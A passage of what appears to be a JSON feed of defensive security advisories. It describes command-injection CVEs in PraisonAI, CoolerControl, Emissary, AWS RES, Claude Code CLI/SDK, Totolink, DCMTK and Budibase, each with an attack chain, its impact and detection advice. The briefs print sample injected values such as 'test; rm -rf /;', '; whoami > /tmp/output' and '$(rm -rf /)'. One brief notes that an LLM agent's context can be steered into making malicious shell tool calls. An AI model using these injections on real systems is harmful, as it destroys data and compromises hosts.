\u003ccode\u003eshell=True\u003c/code\u003e, allowing the shell to interpret the injected metacharacters.\u003c/li\u003e\n\u003cli\u003eThe shell executes the attacker\u0026rsquo;s injected commands, potentially performing actions like reading sensitive files, exfiltrating data, or modifying system configurations.\u003c/li\u003e\n\u003cli\u003eIf using agent mode, an attacker can influence the LLM\u0026rsquo;s context to generate malicious tool calls including shell commands.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves arbitrary code execution with the privileges of the PraisonAI process, leading to system compromise or data breach.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary shell commands on the affected system. This can lead to a variety of negative consequences, including unauthorized access to sensitive data (such as configuration files, credentials, or user data), modification or deletion of system files, and potentially full system compromise. In automated environments like CI/CD pipelines, this vulnerability could allow an attacker to inject malicious code into software builds, leading to supply chain attacks. The vulnerability affects versions of PraisonAI prior to 4.5.121.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect PraisonAI Command Injection via Workflow\u0026rdquo; to identify attempts to exploit this vulnerability through malicious YAML workflow definitions (logsource: \u003ccode\u003eprocess_creation\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect PraisonAI Command Injection via Agent Configuration\u0026rdquo; to identify attempts to exploit this vulnerability through malicious agent configurations (logsource: \u003ccode\u003eprocess_creation\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eBlock the C2 domain \u003ccode\u003eattacker.com\u003c/code\u003e listed in the IOC table at the DNS resolver to prevent data exfiltration and command-and-control communication (type: \u003ccode\u003edomain\u003c/code\u003e, value: \u003ccode\u003eattacker.com\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eUpgrade PraisonAI to version 4.5.121 or later to patch this vulnerability (Affected Packages).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T21:52:10Z","date_published":"2026-04-08T21:52:10Z","id":"/briefs/2024-02-29-praisonai-command-injection/","summary":"PraisonAI is vulnerable to OS command injection due to the use of `subprocess.run()` with `shell=True` on user-controlled inputs, allowing attackers to inject arbitrary shell commands and potentially leading to sensitive data exfiltration or system compromise in versions prior to 4.5.121.","title":"PraisonAI Vulnerable to OS Command Injection","url":"https://feed.craftedsignal.io/briefs/2024-02-29-praisonai-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.2,"id":"CVE-2026-5208"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","privilege-escalation","coolercontrol"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCoolerControl/coolercontrold, a system monitoring and management tool, is susceptible to a command injection vulnerability (CVE-2026-5208) in versions prior to 4.0.0. The vulnerability stems from insufficient sanitization of user-supplied input used to create alert names. An authenticated attacker with high privileges can inject arbitrary bash commands into the alert name field. Due to the application\u0026rsquo;s execution context, these injected commands are executed with root privileges, potentially leading to complete system compromise. The vulnerability was reported and patched in version 4.0.0. This poses a significant risk to organizations using affected versions of CoolerControl/coolercontrold, as it allows for trivial privilege escalation and arbitrary code execution.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to the CoolerControl/coolercontrold application with high-privilege credentials.\u003c/li\u003e\n\u003cli\u003eAttacker navigates to the alert configuration section of the application.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious alert name containing injected bash commands (e.g., \u003ccode\u003etest; rm -rf /;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eAttacker saves the new alert configuration with the injected command in the alert name.\u003c/li\u003e\n\u003cli\u003eWhen the alert is triggered or processed by the application, the injected command is executed within the context of the CoolerControl/coolercontrold process.\u003c/li\u003e\n\u003cli\u003eDue to insufficient input validation, the operating system executes the injected command, in this example \u003ccode\u003erm -rf /\u003c/code\u003e which would recursively delete every file on the system.\u003c/li\u003e\n\u003cli\u003eThe injected commands are executed with root privileges, resulting in arbitrary code execution.\u003c/li\u003e\n\u003cli\u003eThe attacker gains complete control of the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5208 allows an attacker to execute arbitrary code with root privileges on the affected system. This could lead to complete system compromise, including data theft, data destruction, denial of service, and the installation of backdoors or other malicious software. Since this can be exploited via an application setting, a wide range of systems could be impacted.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade CoolerControl/coolercontrold to version 4.0.0 or later to patch CVE-2026-5208, as mentioned in the vulnerability description.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Alert Creation\u003c/code\u003e to identify attempts to inject commands into alert names.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for suspicious commands executed by the CoolerControl/coolercontrold process. Enable Sysmon process-creation logging to facilitate this.\u003c/li\u003e\n\u003cli\u003eReview existing alert configurations for any suspicious or unexpected commands.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T12:16:22Z","date_published":"2026-04-08T12:16:22Z","id":"/briefs/2026-04-coolercontrol-cmd-injection/","summary":"CoolerControl/coolercontrold versions before 4.0.0 are vulnerable to command injection, allowing authenticated attackers with high privileges to execute arbitrary code as root by injecting bash commands into alert names.","title":"CoolerControl Command Injection Vulnerability (CVE-2026-5208)","url":"https://feed.craftedsignal.io/briefs/2026-04-coolercontrol-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-35581"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve","command injection","emissary"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eEmissary is a P2P-based data-driven workflow engine. Prior to version 8.39.0, a critical vulnerability, CVE-2026-35581, existed within the Executrix utility class. This class constructs shell commands by concatenating configuration-derived values, specifically the PLACE_NAME parameter, without proper sanitization. The inadequate sanitization process only replaced spaces with underscores, leaving shell metacharacters (;, |, $, `, (, ), etc.) vulnerable to injection. This flaw allows attackers to inject arbitrary commands into the /bin/sh -c command execution. Emissary version 8.39.0 addresses and resolves this command injection vulnerability. This vulnerability allows for privilege escalation to an attacker with high priviledges.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker with high privileges gains access to the Emissary configuration.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the PLACE_NAME configuration parameter to include malicious shell metacharacters (e.g., \u003ccode\u003e; whoami \u0026gt; /tmp/output\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe system uses the modified PLACE_NAME parameter to construct a shell command.\u003c/li\u003e\n\u003cli\u003eThe Executrix utility class executes the command via \u003ccode\u003e/bin/sh -c\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected shell metacharacters allow the attacker\u0026rsquo;s command (\u003ccode\u003ewhoami\u003c/code\u003e) to execute.\u003c/li\u003e\n\u003cli\u003eThe output of the command is written to \u003ccode\u003e/tmp/output\u003c/code\u003e, confirming arbitrary command execution.\u003c/li\u003e\n\u003cli\u003eThe attacker can then use the initial foothold to escalate privileges further.\u003c/li\u003e\n\u003cli\u003eThe attacker gains full control of the affected system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-35581 allows a high-privilege attacker to achieve arbitrary command execution on the Emissary server. The CVSS v3.1 score of 7.2 indicates a high level of severity. Depending on the Emissary deployment, this could lead to data breaches, service disruption, or complete system compromise. The number of victims and specific sectors targeted are currently unknown.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Emissary to version 8.39.0 or later to remediate CVE-2026-35581.\u003c/li\u003e\n\u003cli\u003eMonitor Emissary configuration files for unauthorized modifications to the PLACE_NAME parameter.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization for all configuration parameters to prevent command injection attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious PLACE_NAME Parameter Modification\u003c/code\u003e to detect exploitation attempts.\u003c/li\u003e\n\u003cli\u003eEnable command-line auditing to log all commands executed by the Emissary process.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-07T17:16:33Z","date_published":"2026-04-07T17:16:33Z","id":"/briefs/2026-04-emissary-command-injection/","summary":"Emissary, a P2P data-driven workflow engine, is vulnerable to OS command injection due to insufficient sanitization of the PLACE_NAME parameter in versions prior to 8.39.0, allowing for arbitrary command execution.","title":"Emissary OS Command Injection Vulnerability (CVE-2026-35581)","url":"https://feed.craftedsignal.io/briefs/2026-04-emissary-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5707"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve","command-injection","aws","res"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5707 is an OS command injection vulnerability affecting AWS Research and Engineering Studio (RES) versions 2025.03 through 2025.12.01. The vulnerability resides in the virtual desktop session name handling, where user-supplied input is not properly sanitized before being used in an OS command. A remote, authenticated attacker can exploit this flaw by providing a specially crafted session name, leading to arbitrary command execution as root on the virtual desktop host. Successful exploitation allows the attacker to gain full control over the affected host, potentially compromising sensitive data and disrupting services. Users are advised to upgrade to RES version 2026.03 or apply the corresponding mitigation patch to their existing environment. The vulnerability was reported on April 6, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker authenticates to the AWS RES environment with valid credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker initiates a request to create a new virtual desktop session.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious session name containing OS command injection payload.\u003c/li\u003e\n\u003cli\u003eThe malicious session name is passed to the vulnerable function in AWS RES without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe vulnerable function executes an OS command, incorporating the unsanitized session name.\u003c/li\u003e\n\u003cli\u003eThe injected command within the session name is executed with root privileges on the virtual desktop host.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary command execution, allowing them to install malware, create new users, or modify system configurations.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves complete control of the virtual desktop host.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5707 allows a remote attacker to execute arbitrary commands with root privileges on the virtual desktop host. This can lead to a complete compromise of the system, potentially affecting all users and data within the AWS RES environment. The attacker can steal sensitive information, install persistent backdoors, or disrupt critical services. The exact number of potential victims is unknown, but any organization utilizing vulnerable versions of AWS RES is at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately upgrade AWS Research and Engineering Studio (RES) to version 2026.03 or apply the recommended mitigation patch to address CVE-2026-5707.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization for all user-supplied data, especially session names, to prevent OS command injection vulnerabilities.\u003c/li\u003e\n\u003cli\u003eMonitor AWS RES logs for suspicious activity related to session creation and command execution on the virtual desktop hosts.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious Session Names with OS Command Injection Characters\u0026rdquo; to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eReview and harden the security configurations of the virtual desktop hosts to limit the impact of potential command execution.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T22:16:25Z","date_published":"2026-04-06T22:16:25Z","id":"/briefs/2026-04-aws-res-cmd-injection/","summary":"A remote authenticated attacker can execute arbitrary commands as root on the virtual desktop host by crafting a malicious session name in AWS Research and Engineering Studio (RES) versions 2025.03 through 2025.12.01 due to unsanitized input, leading to complete system compromise.","title":"AWS Research and Engineering Studio OS Command Injection Vulnerability (CVE-2026-5707)","url":"https://feed.craftedsignal.io/briefs/2026-04-aws-res-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-35022"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","cve-2026-35022","anthropic","claude"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Anthropic Claude Code CLI and Claude Agent SDK are vulnerable to OS command injection (CVE-2026-35022). This vulnerability stems from the insecure execution of authentication helper configuration values. Specifically, the application executes commands using \u003ccode\u003eshell=true\u003c/code\u003e without proper input validation on parameters such as \u003ccode\u003eapiKeyHelper\u003c/code\u003e, \u003ccode\u003eawsAuthRefresh\u003c/code\u003e, \u003ccode\u003eawsCredentialExport\u003c/code\u003e, and \u003ccode\u003egcpAuthRefresh\u003c/code\u003e. An attacker who can manipulate these authentication settings can inject shell metacharacters to execute arbitrary commands with the privileges of the user or automation environment running the Claude CLI or SDK. This can lead to credential theft and the exfiltration of sensitive environment variables. Defenders should focus on detecting attempts to modify authentication settings or the execution of commands originating from the Claude CLI or SDK with suspicious arguments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to the configuration settings of the Anthropic Claude Code CLI or Claude Agent SDK. This could be achieved through compromised credentials or a separate vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the \u003ccode\u003eapiKeyHelper\u003c/code\u003e, \u003ccode\u003eawsAuthRefresh\u003c/code\u003e, \u003ccode\u003eawsCredentialExport\u003c/code\u003e, or \u003ccode\u003egcpAuthRefresh\u003c/code\u003e parameters within the authentication configuration.\u003c/li\u003e\n\u003cli\u003eThe attacker injects shell metacharacters (e.g., \u003ccode\u003e;\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e, \u003ccode\u003e\u0026amp;\u0026amp;\u003c/code\u003e) into these parameters, crafting malicious commands.\u003c/li\u003e\n\u003cli\u003eThe Claude CLI or SDK attempts to authenticate, executing the configured helper command using \u003ccode\u003eshell=true\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected shell metacharacters cause the operating system to execute the attacker\u0026rsquo;s malicious commands.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s commands steal credentials stored on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s commands exfiltrate sensitive environment variables to an external server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials and environment variables to gain further access to the victim\u0026rsquo;s systems or data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-35022 allows attackers to execute arbitrary commands on the system running the Anthropic Claude Code CLI or Claude Agent SDK. This can lead to the theft of sensitive credentials, such as API keys and AWS credentials, and the exfiltration of environment variables containing sensitive information. The impact includes unauthorized access to cloud resources, data breaches, and potential supply chain compromise if the compromised environment is used for software development or deployment. The scope of the impact depends on the permissions of the user or automation environment running the vulnerable software.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process execution for suspicious commands originating from the Claude CLI or SDK with command-line arguments containing shell metacharacters. Implement the Sigma rule \u0026ldquo;Detect Claude CLI/SDK Command Injection via Shell Metacharacters\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eImplement strict access control policies to limit who can modify the configuration settings of the Claude CLI or SDK.\u003c/li\u003e\n\u003cli\u003eRegularly audit the configuration settings of the Claude CLI or SDK for any unauthorized changes.\u003c/li\u003e\n\u003cli\u003ePatch CVE-2026-35022 as soon as a patch is available from Anthropic.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T20:16:25Z","date_published":"2026-04-06T20:16:25Z","id":"/briefs/2026-04-claude-command-injection/","summary":"CVE-2026-35022 describes an OS command injection vulnerability in the Anthropic Claude Code CLI and Claude Agent SDK that allows attackers with control over authentication settings to execute arbitrary commands, potentially leading to credential theft and environment variable exfiltration.","title":"Anthropic Claude Code CLI/SDK OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-claude-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-35021"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve-2026-35021","command-injection","anthropic"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Anthropic Claude Code CLI and Claude Agent SDK are susceptible to an OS command injection vulnerability, as detailed in CVE-2026-35021. This flaw stems from the insufficient sanitization of file paths within the prompt editor invocation utility. An attacker can exploit this vulnerability by injecting shell metacharacters into file paths, which are then interpolated into shell commands executed using \u003ccode\u003eexecSync\u003c/code\u003e. The use of double quotes around the file path does not prevent command substitution, enabling attackers to execute arbitrary commands with the privileges of the user running the CLI, creating a high-risk scenario for compromised systems.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious file path containing shell metacharacters (e.g., \u003ccode\u003e$()\u003c/code\u003e, backticks).\u003c/li\u003e\n\u003cli\u003eThe malicious file path is provided as input to the Anthropic Claude Code CLI or Agent SDK, specifically targeting the prompt editor invocation utility.\u003c/li\u003e\n\u003cli\u003eThe application interpolates the attacker-controlled file path into a shell command.\u003c/li\u003e\n\u003cli\u003eThe shell command, now containing the injected payload, is executed via the \u003ccode\u003eexecSync\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe shell interprets the injected metacharacters, triggering command substitution.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s injected commands are executed with the privileges of the user running the CLI or SDK.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows attackers to execute arbitrary commands on the affected system. This could lead to complete system compromise, data exfiltration, or deployment of malicious payloads such as ransomware. Due to the nature of the vulnerability, any system utilizing the Claude Code CLI or Agent SDK is potentially at risk if it processes untrusted file paths.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Claude CLI/Agent SDK Command Execution\u003c/code\u003e to identify potential command injection attempts via process creation logs.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for command line arguments containing shell metacharacters being passed to processes spawned by the Claude CLI or Agent SDK using the \u003ccode\u003eProcess Creation with Shell Metacharacters\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eApply any available patches or updates released by Anthropic to address CVE-2026-35021 once they are available.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T20:16:25Z","date_published":"2026-04-06T20:16:25Z","id":"/briefs/2026-04-claude-code-cmd-injection/","summary":"The Anthropic Claude Code CLI and Claude Agent SDK are vulnerable to OS command injection via crafted file paths, allowing arbitrary command execution.","title":"Anthropic Claude Code CLI/Agent SDK OS Command Injection Vulnerability (CVE-2026-35021)","url":"https://feed.craftedsignal.io/briefs/2026-04-claude-code-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5677"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve-2026-5677","totolink","command-injection","network-device"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical OS command injection vulnerability, tracked as CVE-2026-5677, has been identified in Totolink A7100RU routers running firmware version 7.4cu.2313_b20191024. The vulnerability resides within the \u003ccode\u003eCsteSystem\u003c/code\u003e function of the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. By manipulating the \u003ccode\u003eresetFlags\u003c/code\u003e argument, a remote attacker can inject and execute arbitrary operating system commands on the affected device. This exploit is publicly available, increasing the risk of widespread exploitation. Successful exploitation allows an attacker to gain complete control over the device, potentially leading to data theft, denial of service, or use of the router as part of a botnet.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink A7100RU router with firmware version 7.4cu.2313_b20191024.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe HTTP request includes the \u003ccode\u003eresetFlags\u003c/code\u003e argument with a malicious payload containing OS commands.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eCsteSystem\u003c/code\u003e function processes the request without proper sanitization of the \u003ccode\u003eresetFlags\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the router\u0026rsquo;s operating system.\u003c/li\u003e\n\u003cli\u003eThe attacker can then install persistent backdoors, modify router settings, or use the device for further attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5677 allows a remote attacker to execute arbitrary commands on vulnerable Totolink A7100RU routers. This can lead to complete compromise of the device, enabling attackers to steal sensitive information, disrupt network services, or use the router as a launchpad for other attacks, such as botnet participation or man-in-the-middle attacks. Given the widespread use of Totolink routers, a successful large-scale exploitation could affect thousands of users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Totolink A7100RU CsteSystem Command Injection Attempt\u003c/code\u003e to your SIEM to identify malicious requests to the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eInspect web server logs for suspicious POST requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e containing shell metacharacters in the \u003ccode\u003eresetFlags\u003c/code\u003e parameter to detect exploitation attempts (webserver logs).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T19:16:30Z","date_published":"2026-04-06T19:16:30Z","id":"/briefs/2026-04-totolink-os-command-injection/","summary":"A remote OS command injection vulnerability (CVE-2026-5677) exists in the CsteSystem function of the /cgi-bin/cstecgi.cgi file in Totolink A7100RU firmware version 7.4cu.2313_b20191024 due to improper handling of the resetFlags argument.","title":"Totolink A7100RU OS Command Injection Vulnerability (CVE-2026-5677)","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-os-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5663"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","dcmtk","cve-2026-5663","storescp"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA command injection vulnerability, identified as CVE-2026-5663, affects OFFIS DCMTK (Dicom ToolKit) versions up to 3.7.0. The vulnerability is located within the \u003ccode\u003estorescp\u003c/code\u003e application, specifically in the \u003ccode\u003eexecuteOnReception\u003c/code\u003e and \u003ccode\u003eexecuteOnEndOfStudy\u003c/code\u003e functions of the \u003ccode\u003edcmnet/apps/storescp.cc\u003c/code\u003e file. An attacker can exploit this flaw by manipulating input parameters processed by these functions, leading to arbitrary OS command execution on the server. Remote exploitation is possible, making this a critical issue for systems utilizing vulnerable DCMTK versions. Applying the patch edbb085e45788dccaf0e64d71534cfca925784b8, available on the DCMTK GitHub repository, is the recommended course of action.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable OFFIS DCMTK instance running \u003ccode\u003estorescp\u003c/code\u003e exposed on the network.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious DICOM request containing specially crafted parameters designed to exploit the command injection vulnerability in the \u003ccode\u003eexecuteOnReception\u003c/code\u003e or \u003ccode\u003eexecuteOnEndOfStudy\u003c/code\u003e functions.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003estorescp\u003c/code\u003e application receives the malicious DICOM request.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003eexecuteOnReception\u003c/code\u003e or \u003ccode\u003eexecuteOnEndOfStudy\u003c/code\u003e functions process the attacker-controlled parameters without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe application attempts to execute a system command using the unsanitized input, injecting attacker-supplied code.\u003c/li\u003e\n\u003cli\u003eThe injected code executes arbitrary commands on the underlying operating system with the privileges of the \u003ccode\u003estorescp\u003c/code\u003e process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains the ability to read sensitive files, modify system configurations, or execute malicious binaries.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes persistence on the system or pivots to other internal resources.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5663 can lead to complete compromise of the affected system. This allows an attacker to execute arbitrary commands, potentially leading to data theft, denial of service, or further propagation within the network. The healthcare sector, which relies heavily on DICOM for medical imaging, is particularly at risk. Unpatched DCMTK instances expose sensitive patient data and critical infrastructure to potential attacks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the patch \u003ccode\u003eedbb085e45788dccaf0e64d71534cfca925784b8\u003c/code\u003e from the DCMTK GitHub repository to remediate CVE-2026-5663 immediately.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious activity originating from or directed to DCMTK servers, specifically looking for unusual command execution patterns (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization for all user-supplied data processed by DCMTK applications to prevent command injection vulnerabilities in the future.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T15:17:16Z","date_published":"2026-04-06T15:17:16Z","id":"/briefs/2026-04-dcmtk-command-injection/","summary":"A remote command injection vulnerability exists in OFFIS DCMTK version 3.7.0 and earlier due to insufficient input sanitization in the `storescp` application, potentially allowing unauthenticated attackers to execute arbitrary OS commands.","title":"OFFIS DCMTK Command Injection Vulnerability (CVE-2026-5663)","url":"https://feed.craftedsignal.io/briefs/2026-04-dcmtk-command-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","rce","budibase"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA command injection vulnerability has been identified in Budibase versions prior to 3.33.4, specifically within the bash automation step located in \u003ccode\u003epackages/server/src/automations/steps/bash.ts\u003c/code\u003e. This flaw allows an attacker with permissions to create or modify automation workflows to inject arbitrary shell commands. The vulnerability stems from the usage of \u003ccode\u003eexecSync\u003c/code\u003e to execute user-supplied commands without adequate sanitization or validation. Input is processed through \u003ccode\u003eprocessStringSync\u003c/code\u003e, enabling template interpolation that can be exploited for command injection. Successful exploitation could lead to remote code execution, complete system compromise, data exfiltration, and lateral movement within the affected infrastructure. Defenders should prioritize patching or implementing mitigations to prevent exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains access to the Budibase platform with the ability to create or modify automation workflows.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious payload containing shell commands embedded within template syntax (e.g., \u003ccode\u003e$(rm -rf /)\u003c/code\u003e, \u003ccode\u003e; malicious-command\u003c/code\u003e, \u003ccode\u003e| malicious-command\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker injects the malicious payload into the \u003ccode\u003einputs.code\u003c/code\u003e field of a bash automation step.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eprocessStringSync\u003c/code\u003e function processes the user-supplied input, interpolating the template syntax and generating a command string.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eexecSync\u003c/code\u003e function executes the crafted command string without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected shell commands execute on the server with the privileges of the Budibase application.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves remote code execution, potentially gaining control of the server.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as data exfiltration, lateral movement, or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to severe consequences, including remote code execution (RCE) on the Budibase server. This could result in complete system compromise, allowing attackers to steal sensitive data, modify system configurations, or use the compromised system as a pivot point for further attacks 